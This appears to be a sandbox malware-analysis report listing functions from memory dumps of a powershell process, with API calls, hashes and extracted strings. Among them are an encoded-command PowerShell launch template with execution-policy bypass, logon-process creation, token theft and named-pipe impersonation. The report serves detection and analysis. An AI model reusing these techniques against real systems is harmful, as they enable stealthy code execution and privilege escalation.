Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
String ID:
API String ID: 4060740672-0
Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
Instruction ID: 717b63df563f036b04009d633f52ffe8190fd29257b7b9cacc2021af72a68781
Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
Instruction Fuzzy Hash: B311E63A702284C5F719EF2DDC413EC6650A7A37E1F5D86249515473D7E6B484488352

Function 000001A6ED355C58 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED355C79

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

__doserrno.LIBCMT ref: 000001A6ED355C71

Part of subcall function 000001A6ED351CA8: _getptd_noexit.LIBCMT ref: 000001A6ED351CAC

__lock_fhandle.LIBCMT ref: 000001A6ED355CBD
_close_nolock.LIBCMT ref: 000001A6ED355CD0

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
String ID:
API String ID: 4060740672-0
Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
Instruction ID: 3e2932c82322211481e02cc327449e93d2d4212259e02e1778acf71364c0455c
Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
Instruction Fuzzy Hash: DB11E23A7032C0C6F316EF6D98853EC7691ABA3761F6D0724D916473D3C678D8498312

Function 000001A6ED2E3A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2E3AA9

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

malloc.LIBCMT ref: 000001A6ED2E3AB3

Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE718
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE71D

malloc.LIBCMT ref: 000001A6ED2E3ABE
free.LIBCMT ref: 000001A6ED2E3C7E
free.LIBCMT ref: 000001A6ED2E3C86
free.LIBCMT ref: 000001A6ED2E3C8E

Part of subcall function 000001A6ED2E48F0: malloc.LIBCMT ref: 000001A6ED2E493A
Part of subcall function 000001A6ED2E48F0: malloc.LIBCMT ref: 000001A6ED2E4945
Part of subcall function 000001A6ED2E48F0: free.LIBCMT ref: 000001A6ED2E4A2C
Part of subcall function 000001A6ED2E48F0: free.LIBCMT ref: 000001A6ED2E4A34

free.LIBCMT ref: 000001A6ED2E3C9A
free.LIBCMT ref: 000001A6ED2E3CA7
free.LIBCMT ref: 000001A6ED2E3CB4

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: db69d602f1943cf1bf5e1787111993c61e1e003504124b10c032ff47382cd6cb
Instruction ID: 666085d0b1086859bce7a7f27c4837f5d6ec9e8a457165469d8a5779b802c414
Opcode Fuzzy Hash: db69d602f1943cf1bf5e1787111993c61e1e003504124b10c032ff47382cd6cb
Instruction Fuzzy Hash: 55711A36306784CEEB92DB3A94407EE7791BBA6BC9F088414DF4607B85DB38C409CB12

Function 000001A6ED33460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED3346A9

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

malloc.LIBCMT ref: 000001A6ED3346B3

Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F318
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F31D

malloc.LIBCMT ref: 000001A6ED3346BE
free.LIBCMT ref: 000001A6ED33487E
free.LIBCMT ref: 000001A6ED334886
free.LIBCMT ref: 000001A6ED33488E

Part of subcall function 000001A6ED3354F0: malloc.LIBCMT ref: 000001A6ED33553A
Part of subcall function 000001A6ED3354F0: malloc.LIBCMT ref: 000001A6ED335545
Part of subcall function 000001A6ED3354F0: free.LIBCMT ref: 000001A6ED33562C
Part of subcall function 000001A6ED3354F0: free.LIBCMT ref: 000001A6ED335634

free.LIBCMT ref: 000001A6ED33489A
free.LIBCMT ref: 000001A6ED3348A7
free.LIBCMT ref: 000001A6ED3348B4

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh$AllocHeap
String ID:
API String ID: 3534990644-0
Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
Instruction ID: ab9d733fb6d8a65804c78c09dfabc297ec54e2b639a9190f49d88f8d5fd3c1cd
Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
Instruction Fuzzy Hash: EB71023E3026C0CBEA60DB6E95447EA7791B7A7BC8F084125DD564BB86DB39C40AC702

Function 000001A6ED2EBE74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 296COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED2F53EC: malloc.LIBCMT ref: 000001A6ED2F5408

malloc.LIBCMT ref: 000001A6ED2EBF3B

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

Part of subcall function 000001A6ED2FB630: _time64.LIBCMT ref: 000001A6ED2FB654
Part of subcall function 000001A6ED2FB630: malloc.LIBCMT ref: 000001A6ED2FB69C
Part of subcall function 000001A6ED2FB630: strtok.LIBCMT ref: 000001A6ED2FB700
Part of subcall function 000001A6ED2FB630: strtok.LIBCMT ref: 000001A6ED2FB711

Part of subcall function 000001A6ED2F28A0: _time64.LIBCMT ref: 000001A6ED2F28AE

Part of subcall function 000001A6ED2FDEA8: malloc.LIBCMT ref: 000001A6ED2FDEF8

Part of subcall function 000001A6ED2FDEA8: realloc.LIBCMT ref: 000001A6ED2FDF07

malloc.LIBCMT ref: 000001A6ED2EC04A
_snprintf.LIBCMT ref: 000001A6ED2EC0C1
_snprintf.LIBCMT ref: 000001A6ED2EC0E7
_snprintf.LIBCMT ref: 000001A6ED2EC10E
free.LIBCMT ref: 000001A6ED2EC2C6

Part of subcall function 000001A6ED2FA144: malloc.LIBCMT ref: 000001A6ED2FA178
Part of subcall function 000001A6ED2FA144: free.LIBCMT ref: 000001A6ED2FA32F

Strings

/'); %s, xrefs: 000001A6ED2EC0B2, 000001A6ED2EC0DA, 000001A6ED2EC0F1

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
String ID: /'); %s
API String ID: 1314452303-1283008465
Opcode ID: 230a710bdbc385172d0855d0a4b2ef21548c59b6f91c62af24776a2cde258627
Instruction ID: ce26ba01abf5096307e3632d47fd8150b356232b9509cb49dc9f7a7e53336d38
Opcode Fuzzy Hash: 230a710bdbc385172d0855d0a4b2ef21548c59b6f91c62af24776a2cde258627
Instruction Fuzzy Hash: 04C1AF39702281CEFA95EBBE94517ED2291ABA7780F5C4824AF15573C7DE39C80E9703

Function 000001A6ED2EE004 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001A6ED2EE0D3
_snprintf.LIBCMT ref: 000001A6ED2EE0FE
_snprintf.LIBCMT ref: 000001A6ED2EE11A
_snprintf.LIBCMT ref: 000001A6ED2EE1CF
_snprintf.LIBCMT ref: 000001A6ED2EE1E6

Strings

/'); %s, xrefs: 000001A6ED2EE0CA, 000001A6ED2EE0F5, 000001A6ED2EE1C4
rshell -nop -exec bypass -EncodedCommand "%s", xrefs: 000001A6ED2EE02A

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _snprintf
String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
API String ID: 3512837008-1250630670
Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction ID: 22b005712d652bd5278567e09767a695c72a26b109ed0728238fbfd417e6c781
Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction Fuzzy Hash: 25819D3A702A45CAEB80DB69E8403DD33A1F7A6788F580522DB4D57796DF38C80DC742

Function 000001A6ED341478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON

Download Yara Rule

APIs

Part of subcall function 000001A6ED345FEC: malloc.LIBCMT ref: 000001A6ED346008

GetStartupInfoA.KERNEL32 ref: 000001A6ED341540

Part of subcall function 000001A6ED33FE54: MultiByteToWideChar.KERNEL32 ref: 000001A6ED33FE81
Part of subcall function 000001A6ED33FE54: MultiByteToWideChar.KERNEL32 ref: 000001A6ED33FEA9

GetCurrentDirectoryW.KERNEL32 ref: 000001A6ED3415CD
GetCurrentDirectoryW.KERNEL32 ref: 000001A6ED3415DC
CreateProcessWithLogonW.ADVAPI32 ref: 000001A6ED341637
GetLastError.KERNEL32 ref: 000001A6ED341641

Strings

%s as %s\%s: %d, xrefs: 000001A6ED341647

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
String ID: %s as %s\%s: %d
API String ID: 3435635427-816037529
Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
Instruction ID: 1c8f96b3ffeb96047e8463c82c9e6a75dc3d676cc901ab1b13dd2ce91a7bfa84
Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
Instruction Fuzzy Hash: 51513B3A315B8186E760DF1AB84479EB7A5F796B80F584025EE8D43B59DF3CC05ACB01

Function 000001A6ED2F0A94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 000001A6ED2F53EC: malloc.LIBCMT ref: 000001A6ED2F5408

Part of subcall function 000001A6ED2FFA20: _errno.LIBCMT ref: 000001A6ED2FF977
Part of subcall function 000001A6ED2FFA20: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FF982

fseek.LIBCMT ref: 000001A6ED2F0B30

Part of subcall function 000001A6ED3002A4: _errno.LIBCMT ref: 000001A6ED3002CC
Part of subcall function 000001A6ED3002A4: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED3002D7

_ftelli64.LIBCMT ref: 000001A6ED2F0B38

Part of subcall function 000001A6ED300318: _errno.LIBCMT ref: 000001A6ED300336
Part of subcall function 000001A6ED300318: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED300341

fseek.LIBCMT ref: 000001A6ED2F0B48

Part of subcall function 000001A6ED3002A4: _fseek_nolock.LIBCMT ref: 000001A6ED3002F5

malloc.LIBCMT ref: 000001A6ED2F0B88

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

Part of subcall function 000001A6ED2EC444: malloc.LIBCMT ref: 000001A6ED2EC457

fclose.LIBCMT ref: 000001A6ED2F0C45

Strings

mode, xrefs: 000001A6ED2F0B07

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
String ID: mode
API String ID: 1756087678-2976727214
Opcode ID: 402d5845c4a113310961eb109c64e08a8b0c88570c4d9bf59124b8cdcbb4eeee
Instruction ID: e6b4dde87b5ef0d694d3f263bdf16199e4ac59b2bc831de173120d3d09d3a30c
Opcode Fuzzy Hash: 402d5845c4a113310961eb109c64e08a8b0c88570c4d9bf59124b8cdcbb4eeee
Instruction Fuzzy Hash: 1341F739306640CAEA50EB2AD4503ED6352B7EBBC0F588521AF5E57BD6DE3CC50D8702

Function 000001A6ED2F8620 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2F864F

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

_snprintf.LIBCMT ref: 000001A6ED2F8667

Part of subcall function 000001A6ED2FEA3C: _errno.LIBCMT ref: 000001A6ED2FEA73
Part of subcall function 000001A6ED2FEA3C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FEA7E

free.LIBCMT ref: 000001A6ED2F867E

Part of subcall function 000001A6ED2FE644: _errno.LIBCMT ref: 000001A6ED2FE664

malloc.LIBCMT ref: 000001A6ED2F86CE
_snprintf.LIBCMT ref: 000001A6ED2F86E6
free.LIBCMT ref: 000001A6ED2F870E

Strings

/'); %s, xrefs: 000001A6ED2F86D3

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID: /'); %s
API String ID: 761449704-1283008465
Opcode ID: 46bc0b5ded448f9ef4667024c9d3f3f2e30065c16e9db5fefb9307cac72c765c
Instruction ID: ce1a229f0b1ef6c64aafdc2033bd7b2065cb1e403cabc17a57410ccbdd60b389
Opcode Fuzzy Hash: 46bc0b5ded448f9ef4667024c9d3f3f2e30065c16e9db5fefb9307cac72c765c
Instruction Fuzzy Hash: 5931F57D30218188E695DB1A28103E9EB61776BFD0F9C4411DFE52B7D6CA38C84E9702

Function 000001A6ED34E98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED34CD6C: NtOpenProcess.NTDLL ref: 000001A6ED34CE0D

GetLastError.KERNEL32 ref: 000001A6ED34E9D7
OpenProcessToken.ADVAPI32 ref: 000001A6ED34E9FB
GetLastError.KERNEL32 ref: 000001A6ED34EA05

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ErrorLastOpenProcess$Token
String ID:
API String ID: 1476857506-0
Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
Instruction ID: bbe14702c0d6700b5d57ea39cbb66abcabd9afaaea1c24f700bf7d4ceab1189b
Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
Instruction Fuzzy Hash: 5431E63D317700C2FB60DB6AE4547DE6690ABA7B90F1C4039AE0543792DE3EC44E8742

Function 000001A6ED2FF210 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED2FF236

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FF242
__crtIsPackagedApp.LIBCMT ref: 000001A6ED2FF253
_dosmaperr.LIBCMT ref: 000001A6ED2FF29D

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
Instruction ID: 63da68f120682861190321d2ca267578a235901d6248dd8da97197c683427da8
Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
Instruction Fuzzy Hash: E531E439302B41CAFB50DB2E98003DDA6D1ABABB94F2C4A24DE45437D6EF38C40C8306

Function 000001A6ED30EFD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED30F004

Part of subcall function 000001A6ED300A00: _getptd.LIBCMT ref: 000001A6ED300A16
Part of subcall function 000001A6ED300A00: __updatetlocinfo.LIBCMT ref: 000001A6ED300A4B
Part of subcall function 000001A6ED300A00: __updatetmbcinfo.LIBCMT ref: 000001A6ED300A72

_errno.LIBCMT ref: 000001A6ED30F01F
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED30F02A

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
Instruction ID: 7110817bc7344c7bad23b5aae9904b93dc6273d283ccb81b203938208343c5a5
Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
Instruction Fuzzy Hash: 4D319C7A305784C6E760DB1994407DEA7A4F3ABBE0F1C8221AA5443BC6EB74C849C702

Function 000001A6ED35FBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED35FC04

Part of subcall function 000001A6ED351600: _getptd.LIBCMT ref: 000001A6ED351616
Part of subcall function 000001A6ED351600: __updatetlocinfo.LIBCMT ref: 000001A6ED35164B
Part of subcall function 000001A6ED351600: __updatetmbcinfo.LIBCMT ref: 000001A6ED351672

_errno.LIBCMT ref: 000001A6ED35FC1F
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED35FC2A

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
Instruction ID: 321f415032512a599b84e03abfb2762dacf89d1df0f448be5ee075413beb4ee4
Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
Instruction Fuzzy Hash: 1B318B7A306780C6E720DB19948479DB7A5F7A7BE0F584221AE9807BC5CB34C849C702

Function 000001A6ED34596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED34597D
ioctlsocket.WS2_32 ref: 000001A6ED34599E
GetTickCount.KERNEL32 ref: 000001A6ED3459E3
ioctlsocket.WS2_32 ref: 000001A6ED345A05

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
Instruction ID: 74e8b5a0855b3173f1b2512bc5c86a33575a118944a91f09c879f2cd6c354da2
Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
Instruction Fuzzy Hash: A211C43A701680C6F720CB6DE84439DB360E797BA4F590224DA59866E0DF7DC88E8712

Function 000001A6ED340AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001A6ED340AC6
ConnectNamedPipe.KERNEL32 ref: 000001A6ED340ADC
ReadFile.KERNEL32 ref: 000001A6ED340B06
ImpersonateNamedPipeClient.ADVAPI32 ref: 000001A6ED340B17
GetCurrentThread.KERNEL32 ref: 000001A6ED340B21
OpenThreadToken.ADVAPI32 ref: 000001A6ED340B39
DisconnectNamedPipe.KERNEL32 ref: 000001A6ED340B4F

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
String ID:
API String ID: 4232080776-0
